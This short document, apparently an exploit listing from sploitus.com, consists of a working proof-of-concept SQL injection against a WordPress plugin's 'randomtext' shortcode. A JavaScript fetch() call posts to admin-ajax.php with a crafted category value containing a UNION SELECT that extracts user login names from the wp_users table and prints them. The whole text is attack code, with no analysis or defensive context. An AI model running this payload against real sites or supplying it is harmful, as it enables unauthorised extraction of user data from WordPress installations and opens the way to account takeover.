Share
## https://sploitus.com/exploit?id=WPEX-ID:77861A2E-879A-4BD0-B4C0-CD19481ACE5D
fetch('/wp-admin/admin-ajax.php', {
        method: 'POST',
        headers: new Headers({
            'Content-Type': 'application/x-www-form-urlencoded',
        }),
        body: 'action=parse-media-shortcode&shortcode=[randomtext category="\' UNION SELECT 1, user_login COLLATE utf8mb4_unicode_520_ci FROM wp_users #"]'
    }).then(response => response.text()).then(result => console.log(result)).catch(error => console.log('error', error));